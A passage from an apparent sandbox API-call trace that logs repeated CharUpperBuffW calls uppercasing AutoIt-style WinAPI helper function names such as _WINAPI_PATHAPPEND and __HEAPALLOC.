lpsz="_WINAPI_RELEASESTREAM") returned 0x15 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_CHARTOOEM", cchLength=0x11 | out: lpsz="_WINAPI_CHARTOOEM") returned 0x11 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_CHARTOOEM", cchLength=0x11 | out: lpsz="_WINAPI_CHARTOOEM") returned 0x11 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_CLIENTTOSCREEN", cchLength=0x16 | out: lpsz="_WINAPI_CLIENTTOSCREEN") returned 0x16 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_CLIENTTOSCREEN", cchLength=0x16 | out: lpsz="_WINAPI_CLIENTTOSCREEN") returned 0x16 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_DWORDTOFLOAT", cchLength=0x14 | out: lpsz="_WINAPI_DWORDTOFLOAT") returned 0x14 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_DWORDTOFLOAT", cchLength=0x14 | out: lpsz="_WINAPI_DWORDTOFLOAT") returned 0x14 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_DWORDTOINT", cchLength=0x12 | out: lpsz="_WINAPI_DWORDTOINT") returned 0x12 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_DWORDTOINT", cchLength=0x12 | out: lpsz="_WINAPI_DWORDTOINT") returned 0x12 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_FLOATTODWORD", cchLength=0x14 | out: lpsz="_WINAPI_FLOATTODWORD") returned 0x14 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_FLOATTODWORD", cchLength=0x14 | out: lpsz="_WINAPI_FLOATTODWORD") returned 0x14 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_FLOATTOINT", cchLength=0x12 | out: lpsz="_WINAPI_FLOATTOINT") returned 0x12 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_FLOATTOINT", cchLength=0x12 | out: lpsz="_WINAPI_FLOATTOINT") returned 0x12 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_GETXYFROMPOINT", cchLength=0x16 | out: lpsz="_WINAPI_GETXYFROMPOINT") returned 0x16 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_GETXYFROMPOINT", cchLength=0x16 | out: lpsz="_WINAPI_GETXYFROMPOINT") returned 0x16 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_GUIDFROMSTRING", cchLength=0x16 | out: lpsz="_WINAPI_GUIDFROMSTRING") returned 0x16 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_GUIDFROMSTRING", cchLength=0x16 | out: lpsz="_WINAPI_GUIDFROMSTRING") returned 0x16 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_GUIDFROMSTRINGEX", cchLength=0x18 | out: lpsz="_WINAPI_GUIDFROMSTRINGEX") returned 0x18 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_GUIDFROMSTRINGEX", cchLength=0x18 | out: lpsz="_WINAPI_GUIDFROMSTRINGEX") returned 0x18 [0070.552] CharUpperBuffW (in: lpsz="_WINAPI_HASHDATA", cchLength=0x10 | out: lpsz="_WINAPI_HASHDATA") returned 0x10 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HASHDATA", cchLength=0x10 | out: lpsz="_WINAPI_HASHDATA") returned 0x10 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HASHSTRING", cchLength=0x12 | out: lpsz="_WINAPI_HASHSTRING") returned 0x12 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HASHSTRING", cchLength=0x12 | out: lpsz="_WINAPI_HASHSTRING") returned 0x12 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HIBYTE", cchLength=0xe | out: lpsz="_WINAPI_HIBYTE") returned 0xe [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HIBYTE", cchLength=0xe | out: lpsz="_WINAPI_HIBYTE") returned 0xe [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HIDWORD", cchLength=0xf | out: lpsz="_WINAPI_HIDWORD") returned 0xf [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HIDWORD", cchLength=0xf | out: lpsz="_WINAPI_HIDWORD") returned 0xf [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HIWORD", cchLength=0xe | out: lpsz="_WINAPI_HIWORD") returned 0xe [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_HIWORD", cchLength=0xe | out: lpsz="_WINAPI_HIWORD") returned 0xe [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_INTTODWORD", cchLength=0x12 | out: lpsz="_WINAPI_INTTODWORD") returned 0x12 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_INTTODWORD", cchLength=0x12 | out: lpsz="_WINAPI_INTTODWORD") returned 0x12 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_INTTOFLOAT", cchLength=0x12 | out: lpsz="_WINAPI_INTTOFLOAT") returned 0x12 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_INTTOFLOAT", cchLength=0x12 | out: lpsz="_WINAPI_INTTOFLOAT") returned 0x12 [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_LOBYTE", cchLength=0xe | out: lpsz="_WINAPI_LOBYTE") returned 0xe [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_LOBYTE", cchLength=0xe | out: lpsz="_WINAPI_LOBYTE") returned 0xe [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_LODWORD", cchLength=0xf | out: lpsz="_WINAPI_LODWORD") returned 0xf [0070.553] CharUpperBuffW (in: lpsz="_WINAPI_LODWORD", cchLength=0xf | out: lpsz="_WINAPI_LODWORD") returned 0xf [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_LOWORD", cchLength=0xe | out: lpsz="_WINAPI_LOWORD") returned 0xe [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_LOWORD", cchLength=0xe | out: lpsz="_WINAPI_LOWORD") returned 0xe [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_LONGMID", cchLength=0xf | out: lpsz="_WINAPI_LONGMID") returned 0xf [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_LONGMID", cchLength=0xf | out: lpsz="_WINAPI_LONGMID") returned 0xf [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKELANGID", cchLength=0x12 | out: lpsz="_WINAPI_MAKELANGID") returned 0x12 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKELANGID", cchLength=0x12 | out: lpsz="_WINAPI_MAKELANGID") returned 0x12 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKELCID", cchLength=0x10 | out: lpsz="_WINAPI_MAKELCID") returned 0x10 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKELCID", cchLength=0x10 | out: lpsz="_WINAPI_MAKELCID") returned 0x10 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKELONG", cchLength=0x10 | out: lpsz="_WINAPI_MAKELONG") returned 0x10 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKELONG", cchLength=0x10 | out: lpsz="_WINAPI_MAKELONG") returned 0x10 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKEQWORD", cchLength=0x11 | out: lpsz="_WINAPI_MAKEQWORD") returned 0x11 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKEQWORD", cchLength=0x11 | out: lpsz="_WINAPI_MAKEQWORD") returned 0x11 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKEWORD", cchLength=0x10 | out: lpsz="_WINAPI_MAKEWORD") returned 0x10 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MAKEWORD", cchLength=0x10 | out: lpsz="_WINAPI_MAKEWORD") returned 0x10 [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MULTIBYTETOWIDECHAR", cchLength=0x1b | out: lpsz="_WINAPI_MULTIBYTETOWIDECHAR") returned 0x1b [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MULTIBYTETOWIDECHAR", cchLength=0x1b | out: lpsz="_WINAPI_MULTIBYTETOWIDECHAR") returned 0x1b [0070.554] CharUpperBuffW (in: lpsz="_WINAPI_MULTIBYTETOWIDECHAREX", cchLength=0x1d | out: lpsz="_WINAPI_MULTIBYTETOWIDECHAREX") returned 0x1d [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_MULTIBYTETOWIDECHAREX", cchLength=0x1d | out: lpsz="_WINAPI_MULTIBYTETOWIDECHAREX") returned 0x1d [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_OEMTOCHAR", cchLength=0x11 | out: lpsz="_WINAPI_OEMTOCHAR") returned 0x11 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_OEMTOCHAR", cchLength=0x11 | out: lpsz="_WINAPI_OEMTOCHAR") returned 0x11 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_POINTFROMRECT", cchLength=0x15 | out: lpsz="_WINAPI_POINTFROMRECT") returned 0x15 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_POINTFROMRECT", cchLength=0x15 | out: lpsz="_WINAPI_POINTFROMRECT") returned 0x15 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_PRIMARYLANGID", cchLength=0x15 | out: lpsz="_WINAPI_PRIMARYLANGID") returned 0x15 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_PRIMARYLANGID", cchLength=0x15 | out: lpsz="_WINAPI_PRIMARYLANGID") returned 0x15 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_SCREENTOCLIENT", cchLength=0x16 | out: lpsz="_WINAPI_SCREENTOCLIENT") returned 0x16 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_SCREENTOCLIENT", cchLength=0x16 | out: lpsz="_WINAPI_SCREENTOCLIENT") returned 0x16 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_SHORTTOWORD", cchLength=0x13 | out: lpsz="_WINAPI_SHORTTOWORD") returned 0x13 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_SHORTTOWORD", cchLength=0x13 | out: lpsz="_WINAPI_SHORTTOWORD") returned 0x13 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATBYTESIZE", cchLength=0x19 | out: lpsz="_WINAPI_STRFORMATBYTESIZE") returned 0x19 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATBYTESIZE", cchLength=0x19 | out: lpsz="_WINAPI_STRFORMATBYTESIZE") returned 0x19 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATBYTESIZEEX", cchLength=0x1b | out: lpsz="_WINAPI_STRFORMATBYTESIZEEX") returned 0x1b [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATBYTESIZEEX", cchLength=0x1b | out: lpsz="_WINAPI_STRFORMATBYTESIZEEX") returned 0x1b [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATKBSIZE", cchLength=0x17 | out: lpsz="_WINAPI_STRFORMATKBSIZE") returned 0x17 [0070.555] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATKBSIZE", cchLength=0x17 | out: lpsz="_WINAPI_STRFORMATKBSIZE") returned 0x17 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_STRFROMTIMEINTERVAL", cchLength=0x1b | out: lpsz="_WINAPI_STRFROMTIMEINTERVAL") returned 0x1b [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_STRFROMTIMEINTERVAL", cchLength=0x1b | out: lpsz="_WINAPI_STRFROMTIMEINTERVAL") returned 0x1b [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_STRINGFROMGUID", cchLength=0x16 | out: lpsz="_WINAPI_STRINGFROMGUID") returned 0x16 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_STRINGFROMGUID", cchLength=0x16 | out: lpsz="_WINAPI_STRINGFROMGUID") returned 0x16 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SUBLANGID", cchLength=0x11 | out: lpsz="_WINAPI_SUBLANGID") returned 0x11 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SUBLANGID", cchLength=0x11 | out: lpsz="_WINAPI_SUBLANGID") returned 0x11 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SWAPDWORD", cchLength=0x11 | out: lpsz="_WINAPI_SWAPDWORD") returned 0x11 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SWAPDWORD", cchLength=0x11 | out: lpsz="_WINAPI_SWAPDWORD") returned 0x11 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SWAPQWORD", cchLength=0x11 | out: lpsz="_WINAPI_SWAPQWORD") returned 0x11 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SWAPQWORD", cchLength=0x11 | out: lpsz="_WINAPI_SWAPQWORD") returned 0x11 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SWAPWORD", cchLength=0x10 | out: lpsz="_WINAPI_SWAPWORD") returned 0x10 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_SWAPWORD", cchLength=0x10 | out: lpsz="_WINAPI_SWAPWORD") returned 0x10 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_WIDECHARTOMULTIBYTE", cchLength=0x1b | out: lpsz="_WINAPI_WIDECHARTOMULTIBYTE") returned 0x1b [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_WIDECHARTOMULTIBYTE", cchLength=0x1b | out: lpsz="_WINAPI_WIDECHARTOMULTIBYTE") returned 0x1b [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_WORDTOSHORT", cchLength=0x13 | out: lpsz="_WINAPI_WORDTOSHORT") returned 0x13 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_WORDTOSHORT", cchLength=0x13 | out: lpsz="_WINAPI_WORDTOSHORT") returned 0x13 [0070.556] CharUpperBuffW (in: lpsz="_WINAPI_CREATEBUFFER", cchLength=0x14 | out: lpsz="_WINAPI_CREATEBUFFER") returned 0x14 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_CREATEBUFFER", cchLength=0x14 | out: lpsz="_WINAPI_CREATEBUFFER") returned 0x14 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_CREATEBUFFERFROMSTRUCT", cchLength=0x1e | out: lpsz="_WINAPI_CREATEBUFFERFROMSTRUCT") returned 0x1e [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_CREATEBUFFERFROMSTRUCT", cchLength=0x1e | out: lpsz="_WINAPI_CREATEBUFFERFROMSTRUCT") returned 0x1e [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_CREATESTRING", cchLength=0x14 | out: lpsz="_WINAPI_CREATESTRING") returned 0x14 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_CREATESTRING", cchLength=0x14 | out: lpsz="_WINAPI_CREATESTRING") returned 0x14 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_EQUALMEMORY", cchLength=0x13 | out: lpsz="_WINAPI_EQUALMEMORY") returned 0x13 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_EQUALMEMORY", cchLength=0x13 | out: lpsz="_WINAPI_EQUALMEMORY") returned 0x13 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_FILLMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_FILLMEMORY") returned 0x12 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_FILLMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_FILLMEMORY") returned 0x12 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_FREEMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_FREEMEMORY") returned 0x12 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_FREEMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_FREEMEMORY") returned 0x12 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_GETMEMORYSIZE", cchLength=0x15 | out: lpsz="_WINAPI_GETMEMORYSIZE") returned 0x15 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_GETMEMORYSIZE", cchLength=0x15 | out: lpsz="_WINAPI_GETMEMORYSIZE") returned 0x15 [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_GLOBALMEMORYSTATUS", cchLength=0x1a | out: lpsz="_WINAPI_GLOBALMEMORYSTATUS") returned 0x1a [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_GLOBALMEMORYSTATUS", cchLength=0x1a | out: lpsz="_WINAPI_GLOBALMEMORYSTATUS") returned 0x1a [0070.557] CharUpperBuffW (in: lpsz="_WINAPI_ISBADCODEPTR", cchLength=0x14 | out: lpsz="_WINAPI_ISBADCODEPTR") returned 0x14 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISBADCODEPTR", cchLength=0x14 | out: lpsz="_WINAPI_ISBADCODEPTR") returned 0x14 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISBADREADPTR", cchLength=0x14 | out: lpsz="_WINAPI_ISBADREADPTR") returned 0x14 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISBADREADPTR", cchLength=0x14 | out: lpsz="_WINAPI_ISBADREADPTR") returned 0x14 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISBADSTRINGPTR", cchLength=0x16 | out: lpsz="_WINAPI_ISBADSTRINGPTR") returned 0x16 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISBADSTRINGPTR", cchLength=0x16 | out: lpsz="_WINAPI_ISBADSTRINGPTR") returned 0x16 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISBADWRITEPTR", cchLength=0x15 | out: lpsz="_WINAPI_ISBADWRITEPTR") returned 0x15 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISBADWRITEPTR", cchLength=0x15 | out: lpsz="_WINAPI_ISBADWRITEPTR") returned 0x15 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISMEMORY", cchLength=0x10 | out: lpsz="_WINAPI_ISMEMORY") returned 0x10 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ISMEMORY", cchLength=0x10 | out: lpsz="_WINAPI_ISMEMORY") returned 0x10 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_LOCALFREE", cchLength=0x11 | out: lpsz="_WINAPI_LOCALFREE") returned 0x11 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_LOCALFREE", cchLength=0x11 | out: lpsz="_WINAPI_LOCALFREE") returned 0x11 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_MOVEMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_MOVEMEMORY") returned 0x12 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_MOVEMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_MOVEMEMORY") returned 0x12 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_READPROCESSMEMORY", cchLength=0x19 | out: lpsz="_WINAPI_READPROCESSMEMORY") returned 0x19 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_READPROCESSMEMORY", cchLength=0x19 | out: lpsz="_WINAPI_READPROCESSMEMORY") returned 0x19 [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_WRITEPROCESSMEMORY", cchLength=0x1a | out: lpsz="_WINAPI_WRITEPROCESSMEMORY") returned 0x1a [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_WRITEPROCESSMEMORY", cchLength=0x1a | out: lpsz="_WINAPI_WRITEPROCESSMEMORY") returned 0x1a [0070.558] CharUpperBuffW (in: lpsz="_WINAPI_ZEROMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_ZEROMEMORY") returned 0x12 [0070.559] CharUpperBuffW (in: lpsz="_WINAPI_ZEROMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_ZEROMEMORY") returned 0x12 [0070.559] CharUpperBuffW (in: lpsz="__HEAPALLOC", cchLength=0xb | out: lpsz="__HEAPALLOC") returned 0xb [0070.559] CharUpperBuffW (in: lpsz="__HEAPALLOC", cchLength=0xb | out: lpsz="__HEAPALLOC") returned 0xb [0070.559] CharUpperBuffW (in: lpsz="__HEAPFREE", cchLength=0xa | out: lpsz="__HEAPFREE") returned 0xa [0070.559] CharUpperBuffW (in: lpsz="__HEAPFREE", cchLength=0xa | out: lpsz="__HEAPFREE") returned 0xa [0070.559] CharUpperBuffW (in: lpsz="__HEAPREALLOC", cchLength=0xd | out: lpsz="__HEAPREALLOC") returned 0xd [0070.559] CharUpperBuffW (in: lpsz="__HEAPREALLOC", cchLength=0xd | out: lpsz="__HEAPREALLOC") returned 0xd [0070.559] CharUpperBuffW (in: lpsz="__HEAPSIZE", cchLength=0xa | out: lpsz="__HEAPSIZE") returned 0xa [0070.559] CharUpperBuffW (in: lpsz="__HEAPSIZE", cchLength=0xa | out: lpsz="__HEAPSIZE") returned 0xa [0070.559] CharUpperBuffW (in: lpsz="__HEAPVALIDATE", cchLength=0xe | out: lpsz="__HEAPVALIDATE") returned 0xe [0070.559] CharUpperBuffW (in: lpsz="__HEAPVALIDATE", cchLength=0xe | out: lpsz="__HEAPVALIDATE") returned 0xe [0070.559] CharUpperBuffW (in: lpsz="_WINAPI_ARRAYTOSTRUCT", cchLength=0x15 | out: lpsz="_WINAPI_ARRAYTOSTRUCT") returned 0x15 [0070.559] CharUpperBuffW (in: lpsz="_WINAPI_ARRAYTOSTRUCT", cchLength=0x15 | out: lpsz="_WINAPI_ARRAYTOSTRUCT") returned 0x15 [0070.559] CharUpperBuffW (in: lpsz="_WINAPI_CREATEMARGINS", cchLength=0x15 | out: lpsz="_WINAPI_CREATEMARGINS") returned 0x15 [0070.559] CharUpperBuffW (in: lpsz="_WINAPI_CREATEMARGINS", cchLength=0x15 | out: lpsz="_WINAPI_CREATEMARGINS") returned 0x15 [0070.559] CharUpperBuffW (in: lpsz="_WINAPI_CREATEPOINT", cchLength=0x13 | out: lpsz="_WINAPI_CREATEPOINT") returned 0x13 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_CREATEPOINT", cchLength=0x13 | out: lpsz="_WINAPI_CREATEPOINT") returned 0x13 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_CREATERECT", cchLength=0x12 | out: lpsz="_WINAPI_CREATERECT") returned 0x12 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_CREATERECT", cchLength=0x12 | out: lpsz="_WINAPI_CREATERECT") returned 0x12 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_CREATERECTEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATERECTEX") returned 0x14 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_CREATERECTEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATERECTEX") returned 0x14 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_CREATESIZE", cchLength=0x12 | out: lpsz="_WINAPI_CREATESIZE") returned 0x12 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_CREATESIZE", cchLength=0x12 | out: lpsz="_WINAPI_CREATESIZE") returned 0x12 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_COPYSTRUCT", cchLength=0x12 | out: lpsz="_WINAPI_COPYSTRUCT") returned 0x12 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_COPYSTRUCT", cchLength=0x12 | out: lpsz="_WINAPI_COPYSTRUCT") returned 0x12 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETEXTENDED", cchLength=0x13 | out: lpsz="_WINAPI_GETEXTENDED") returned 0x13 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETEXTENDED", cchLength=0x13 | out: lpsz="_WINAPI_GETEXTENDED") returned 0x13 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOS", cchLength=0x13 | out: lpsz="_WINAPI_GETMOUSEPOS") returned 0x13 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOS", cchLength=0x13 | out: lpsz="_WINAPI_GETMOUSEPOS") returned 0x13 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOSX", cchLength=0x14 | out: lpsz="_WINAPI_GETMOUSEPOSX") returned 0x14 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOSX", cchLength=0x14 | out: lpsz="_WINAPI_GETMOUSEPOSX") returned 0x14 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOSY", cchLength=0x14 | out: lpsz="_WINAPI_GETMOUSEPOSY") returned 0x14 [0070.560] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOSY", cchLength=0x14 | out: lpsz="_WINAPI_GETMOUSEPOSY") returned 0x14 [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_MULDIV", cchLength=0xe | out: lpsz="_WINAPI_MULDIV") returned 0xe [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_MULDIV", cchLength=0xe | out: lpsz="_WINAPI_MULDIV") returned 0xe [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_PLAYSOUND", cchLength=0x11 | out: lpsz="_WINAPI_PLAYSOUND") returned 0x11 [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_PLAYSOUND", cchLength=0x11 | out: lpsz="_WINAPI_PLAYSOUND") returned 0x11 [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_STRINGLENA", cchLength=0x12 | out: lpsz="_WINAPI_STRINGLENA") returned 0x12 [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_STRINGLENA", cchLength=0x12 | out: lpsz="_WINAPI_STRINGLENA") returned 0x12 [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_STRINGLENW", cchLength=0x12 | out: lpsz="_WINAPI_STRINGLENW") returned 0x12 [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_STRINGLENW", cchLength=0x12 | out: lpsz="_WINAPI_STRINGLENW") returned 0x12 [0070.561] CharUpperBuffW (in: lpsz="_WINAPI_STRUCTTOARRAY", cchLength=0x15 | out: lpsz="_WINAPI_STRUCTTOARRAY") returned 0x15 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_STRUCTTOARRAY", cchLength=0x15 | out: lpsz="_WINAPI_STRUCTTOARRAY") returned 0x15 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_UNIONSTRUCT", cchLength=0x13 | out: lpsz="_WINAPI_UNIONSTRUCT") returned 0x13 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_UNIONSTRUCT", cchLength=0x13 | out: lpsz="_WINAPI_UNIONSTRUCT") returned 0x13 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_COMMANDLINETOARGV", cchLength=0x19 | out: lpsz="_WINAPI_COMMANDLINETOARGV") returned 0x19 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_COMMANDLINETOARGV", cchLength=0x19 | out: lpsz="_WINAPI_COMMANDLINETOARGV") returned 0x19 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_ISNAMEINEXPRESSION", cchLength=0x1a | out: lpsz="_WINAPI_ISNAMEINEXPRESSION") returned 0x1a [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_ISNAMEINEXPRESSION", cchLength=0x1a | out: lpsz="_WINAPI_ISNAMEINEXPRESSION") returned 0x1a [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PARSEURL", cchLength=0x10 | out: lpsz="_WINAPI_PARSEURL") returned 0x10 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PARSEURL", cchLength=0x10 | out: lpsz="_WINAPI_PARSEURL") returned 0x10 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PARSEUSERNAME", cchLength=0x15 | out: lpsz="_WINAPI_PARSEUSERNAME") returned 0x15 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PARSEUSERNAME", cchLength=0x15 | out: lpsz="_WINAPI_PARSEUSERNAME") returned 0x15 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PATHADDBACKSLASH", cchLength=0x18 | out: lpsz="_WINAPI_PATHADDBACKSLASH") returned 0x18 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PATHADDBACKSLASH", cchLength=0x18 | out: lpsz="_WINAPI_PATHADDBACKSLASH") returned 0x18 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PATHADDEXTENSION", cchLength=0x18 | out: lpsz="_WINAPI_PATHADDEXTENSION") returned 0x18 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PATHADDEXTENSION", cchLength=0x18 | out: lpsz="_WINAPI_PATHADDEXTENSION") returned 0x18 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PATHAPPEND", cchLength=0x12 | out: lpsz="_WINAPI_PATHAPPEND") returned 0x12 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PATHAPPEND", cchLength=0x12 | out: lpsz="_WINAPI_PATHAPPEND") returned 0x12 [0070.562] CharUpperBuffW (in: lpsz="_WINAPI_PATHBUILDROOT", cchLength=0x15 | out: lpsz="_WINAPI_PATHBUILDROOT") returned 0x15 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHBUILDROOT", cchLength=0x15 | out: lpsz="_WINAPI_PATHBUILDROOT") returned 0x15 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCANONICALIZE", cchLength=0x18 | out: lpsz="_WINAPI_PATHCANONICALIZE") returned 0x18 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCANONICALIZE", cchLength=0x18 | out: lpsz="_WINAPI_PATHCANONICALIZE") returned 0x18 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMMONPREFIX", cchLength=0x18 | out: lpsz="_WINAPI_PATHCOMMONPREFIX") returned 0x18 [0070.563] 